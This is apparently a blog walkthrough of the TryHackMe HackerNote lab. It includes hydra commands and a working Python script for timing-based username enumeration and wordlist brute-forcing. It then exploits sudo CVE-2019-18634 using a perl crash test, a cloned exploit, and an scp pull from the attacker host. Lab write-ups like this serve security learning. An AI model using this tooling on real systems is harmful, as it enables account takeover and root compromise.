TryHackMe: HackerNote Walkthrough

Yebberdog
5 min read · Oct 15, 2020

I thought it was time to do some more learning, so I have decided to focus on some of the more specific tutorial machines on TryHackMe. This one got my attention, probably due to the title:-).

Anyway, let's start off with the standard Nmap port scan with service version detection and default scripts enabled, see what is open, and start learning some things about this machine.

To start with I will add the IP to the /etc/hosts file, simply because I can never remember the IP address, whereas 'hackernotes.thm' is much easier.

nmap -sV -sC -oN version-scan hackernotes.thm

So let's take a look at the results. We have SSH running on port 22, a Golang net/http server running on ports 80 and 8080, and the operating system appears to be Ubuntu. All I know about Golang is that it is the programming language called 'Go'.

There is nothing we can do at this stage with ssh on port 22, simply because we do not have any credentials, so let’s focus on the web server ports starting with port 80.

Port 80 — Golang net/http server:

So we have a webpage, "Welcome to hackerNote", there is nothing hidden in the source code, but there is a login. The first thing with any website enumeration is to explore the site and fully understand it. So, let's try to log in. I tried some common credentials like admin:admin, but nothing worked, so let's create an account.

We have successfully created an account, so let’s login:

OK, so enough enumeration, we can just follow the tutorial. The basis of the timing attack is to look for a difference in login response time between valid and invalid usernames: typically the server only does the expensive password-hash comparison when the username exists, so a valid username makes the login request take measurably longer, even with a wrong password. I used the Python script available from the link and downloaded the j_names.txt file to start with. Changing the IP and copying the j_names.txt file into the same directory as the Python script, we get:

So we have a username ‘james’, let’s move on to the next part of the tutorial.

In the next part we have to download the wordlist.zip file, extract colors.txt and numbers.txt, and use the combinator.bin utility (from hashcat-utils) to join every colour with every number into a single wordlist we can use with Hydra:

combinator.bin colors.txt numbers.txt > wordlist.txt

We can now use the wordlist with hydra to crack the password for the user and log into the website.

hydra -l james -P wordlist.txt 10.10.106.26 http-post-form "/api/user/login:username=^USER^&password=^PASS^:Invalid Username Or Password"

We find the password and can now log into the website as the cracked user:
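The two steps above (timing-based username enumeration, then the combined-wordlist password attack) written out as one Python script. This is an added example, not the room's script or the author's, and it makes the following assumptions: the login endpoint accepts a form-encoded body of `username=...&password=...` (matching the hydra command above), a failed login contains the string "Invalid Username Or Password" in the response body, and a median response time more than twice the baseline marks a username as valid. The `demo()` function runs entirely on constructed timings and a constructed three-by-three wordlist so the logic can be checked offline; the `__main__` block runs the same functions against a real target.

```python
#!/usr/bin/env python3
"""Username enumeration by login timing, then a wordlist login attack (added example)."""
import itertools
import statistics
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# Assumption: the failure string hydra keys on in the walkthrough's command.
FAIL_MARKER = b"Invalid Username Or Password"


def post_login(url: str, username: str, password: str, timeout: float = 15.0) -> Tuple[float, bytes]:
    """POST one form-encoded login attempt; return (seconds elapsed, response body).

    Assumption: the endpoint takes username=...&password=... like the hydra
    command above; a 4xx reply still carries a timing sample, so keep it.
    """
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read()
    except urllib.error.HTTPError as exc:
        body = exc.read()
    return time.perf_counter() - start, body


def likely_valid(timings: Dict[str, List[float]], ratio: float = 2.0) -> List[str]:
    """Return usernames whose median latency exceeds `ratio` times the baseline, slowest first.

    Medians over several rounds ignore the odd slow packet; the baseline is the
    median of all per-user medians, which works because most candidate names are
    invalid, so the fast (no hash) path dominates.
    """
    medians = {u: statistics.median(t) for u, t in timings.items()}
    baseline = statistics.median(medians.values())
    hits = [u for u, m in medians.items() if m > ratio * baseline]
    return sorted(hits, key=lambda u: medians[u], reverse=True)


def enumerate_users(url: str, candidates: Iterable[str], rounds: int = 5) -> List[str]:
    """Time `rounds` wrong-password logins per candidate and pick the slow ones."""
    timings = {u: [post_login(url, u, "not-the-password")[0] for _ in range(rounds)] for u in candidates}
    return likely_valid(timings)


def combine(colors: Iterable[str], numbers: Iterable[str]) -> List[str]:
    """What combinator.bin does: every colour followed by every number, in file order."""
    return [c + n for c, n in itertools.product(colors, numbers)]


def find_password(attempt: Callable[[str], bool], wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate `attempt` accepts (what hydra -f would stop on), else None."""
    for pw in wordlist:
        if attempt(pw):
            return pw
    return None


def demo() -> Tuple[List[str], Optional[str]]:
    """Offline run on constructed data; no target needed."""
    # Constructed timings: 'james' hits the slow (hashing) path, the others fail fast.
    # 'john' has one slow outlier that the median must not be fooled by.
    timings = {
        "jack": [0.021, 0.019, 0.024, 0.020, 0.022],
        "james": [0.310, 0.295, 0.330, 0.301, 0.299],
        "john": [0.020, 0.023, 0.019, 0.021, 0.250],
    }
    users = likely_valid(timings)
    wordlist = combine(["red", "blue", "green"], ["1", "12", "123"])  # constructed lists
    secret = "blue12"  # constructed; the real password is whatever hydra finds
    found = find_password(lambda pw: pw == secret, wordlist)
    return users, found


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"usage: {sys.argv[0]} http://hackernotes.thm/api/user/login names.txt wordlist.txt")
        sys.exit(1)
    url, names_file, words_file = sys.argv[1:]
    with open(names_file) as f:
        names = [line.strip() for line in f if line.strip()]
    users = enumerate_users(url, names)
    print("likely valid users:", users)
    with open(words_file) as f:
        words = [line.strip() for line in f if line.strip()]
    for user in users:
        pw = find_password(lambda p: FAIL_MARKER not in post_login(url, user, p)[1], words)
        print(f"{user}: {pw}")
```

Sampling each name several times and comparing medians matters on a VPN link to a TryHackMe box: a single slow round trip on an invalid name can otherwise look like a hit, and a single fast one on the real user can hide it.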

SSH Port 22:

With the new credentials, we can now log into the ssh server:

ssh james@10.10.106.26

From here we need to grab user.txt and try to privesc to root. The first thing I always check is whether the user has any sudo rights, using the 'sudo -l' command.

The first thing we notice here is the '******' characters echoed as we type the password. From a previous CTF I remember that this is a potential sign of the sudo vulnerability CVE-2019-18634, a buffer overflow in sudo's password prompt that is exploitable in versions before 1.8.26 (the bug is present up to 1.8.30, but from 1.8.26 the vulnerable path is no longer reachable). For the exploit to work the 'pwfeedback' option must be enabled in sudoers, and that is exactly what the '*******' characters tell us; pwfeedback is not on by default in Ubuntu, so seeing it here is a strong hint. So let's check the sudo version:

We can see that the sudo version is 1.8.21 and we know that pwfeedback is enabled, so this version is subject to the vulnerability, a stack-based buffer overflow that can be exploited to get a root shell.
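The two preconditions just described, a sudo version in the exploitable range and pwfeedback switched on, as a small checker. This is an added example, not the exploit and not code from the room; it assumes the version line looks like "Sudo version 1.8.21p2" (the `p` suffix is Ubuntu's patch level) and that `sudo -l` prints a "Matching Defaults entries" block of comma-separated options, as in the constructed sample below. The version bounds come from the sudo advisory: introduced in 1.7.1, not reachable from 1.8.26.

```python
#!/usr/bin/env python3
"""Check the CVE-2019-18634 preconditions from `sudo --version` and `sudo -l` output (added example)."""
import re
import subprocess
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int, int]  # (major, minor, patch, p-level)

# The overflow was introduced in 1.7.1; from 1.8.26 the vulnerable code path is
# no longer reachable even though the fix proper only landed in 1.8.31.
INTRODUCED: Version = (1, 7, 1, 0)
UNREACHABLE_FROM: Version = (1, 8, 26, 0)


def parse_sudo_version(text: str) -> Optional[Version]:
    """Extract the version tuple from `sudo --version` output; None if no version line."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_exploitable(v: Version) -> bool:
    """Tuple comparison handles the p-level, so 1.8.25p1 < 1.8.26 as intended."""
    return INTRODUCED <= v < UNREACHABLE_FROM


def pwfeedback_enabled(sudo_l_output: str) -> bool:
    """True when the 'Matching Defaults entries' block of `sudo -l` lists pwfeedback.

    Options are comma-separated and may wrap onto indented lines; the block ends
    at the first blank line. A later !pwfeedback switches it back off.
    """
    enabled = False
    in_block = False
    for line in sudo_l_output.splitlines():
        if line.startswith("Matching Defaults entries"):
            in_block = True
            continue
        if in_block and not line.strip():
            break
        if in_block:
            for opt in line.split(","):
                opt = opt.strip()
                if opt == "pwfeedback":
                    enabled = True
                elif opt == "!pwfeedback":
                    enabled = False
    return enabled


def assess(version_text: str, sudo_l_output: str) -> Dict[str, bool]:
    """Combine both checks; 'exploitable' needs the version range AND pwfeedback."""
    v = parse_sudo_version(version_text)
    vuln_version = v is not None and version_exploitable(v)
    feedback = pwfeedback_enabled(sudo_l_output)
    return {"vulnerable_version": vuln_version, "pwfeedback": feedback,
            "exploitable": vuln_version and feedback}


# Constructed sample output, shaped like what james would see on the box.
SAMPLE_VERSION = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"
SAMPLE_SUDO_L = (
    "Matching Defaults entries for james on hackernote:\n"
    "    env_reset, mail_badpass, pwfeedback,\n"
    "    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\n"
    "\n"
)


if __name__ == "__main__":
    ver = subprocess.run(["sudo", "--version"], capture_output=True, text=True).stdout
    lst = subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout  # prompts on the tty
    for key, value in assess(ver, lst).items():
        print(f"{key}: {value}")
```

If you want confirmation without the exploit binary, the sudo advisory's own quick test is to pipe `perl -e 'print(("A" x 100 . "\x{00}") x 50)'` into `sudo -S id`: a vulnerable build answers "Password: Segmentation fault", a patched one just rejects the password.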

We can download the exploit from below:

git clone https://github.com/saleemrashid/sudo-cve-2019-18634.git

To compile the exploit, navigate into the cloned directory and run 'make'; you should now have a binary called 'exploit'.

Start an SSH server on the attack machine so that the exploit can be pulled from it with scp from the target. (Because the target itself runs SSH and we hold james's credentials, the file could equally be pushed from the attack machine to the target with scp, which avoids exposing a service on the attack box; the pull approach is what is shown here.)

sudo systemctl start ssh

If you do not have ssh installed on your machine, you can download it using the following:

sudo apt-get install openssh-server

There is a good tutorial at the link below:

From the remote machine, copy the file into the /home/james directory, where we have full write privileges:

scp garth@10.9.6.68:/home/garth/hacking/tryhackme/hackernote/exploit exploit

To run the exploit simply enter:

./exploit

From here we can navigate to the /root directory and get the root flag:

And there we have it. Although I was familiar with the sudo exploit, I found the timing vulnerability interesting. One thing is for sure, I really need to spend more time learning Python. So I took the decision and enrolled in the following Udemy course. All I need now are more hours in the day and possibly the night.
